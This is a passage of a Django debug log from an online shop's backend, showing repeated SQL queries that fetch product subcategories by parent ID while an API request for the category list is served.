"shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 14:26:20,724 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-13 14:26:20,726 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-13 14:26:20,730 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-13 14:26:20,733 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-13 14:26:20,735 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 14:26:20,740 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-13 14:26:20,742 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-13 14:26:20,746 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-13 14:26:20,748 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-13 14:26:20,751 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-13 14:26:20,754 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 14:26:20,758 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-13 14:26:20,761 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-13 14:26:20,763 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-13 14:26:20,766 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-13 14:26:20,769 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 14:26:20,774 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-13 14:26:20,777 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-13 14:26:20,779 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-13 14:26:20,782 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-13 14:26:20,785 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 14:26:20,790 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-13 14:26:20,792 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-13 14:26:20,796 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-13 14:26:20,799 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-13 14:26:20,802 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-13 14:26:20,807 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 14:26:20,811 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-13 14:26:20,813 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-13 14:26:20,816 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-13 14:26:20,820 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-13 14:26:20,822 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [13/Dec/2019 14:26:20] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [13/Dec/2019 14:26:53] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-13 14:30:46,832 utils 20136 140506667599616 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 14:30:46,849 utils 20136 140506667599616 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 14:30:46,860 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-13 14:30:46,867 utils 20136 140506667599616 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 14:30:46,876 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-13 14:30:46,881 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-13 14:30:46,885 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-13 14:30:46,889 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-13 14:30:46,893 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 14:30:46,899 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-13 14:30:46,904 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-13 14:30:46,908 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-13 14:30:46,912 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-13 14:30:46,916 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 14:30:46,922 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-13 14:30:46,926 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-13 14:30:46,929 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-13 14:30:46,932 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-13 14:30:46,935 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 14:30:46,942 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-13 14:30:46,945 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-13 14:30:46,948 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-13 14:30:46,951 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-13 14:30:46,953 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-13 14:30:46,956 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 14:30:46,960 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-13 14:30:46,962 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-13 14:30:46,965 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-13 14:30:46,968 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-13 14:30:46,970 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 14:30:46,974 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-13 14:30:46,977 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-13 14:30:46,980 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-13 14:30:46,982 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-13 14:30:46,985 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 14:30:46,989 utils 20136 140506667599616 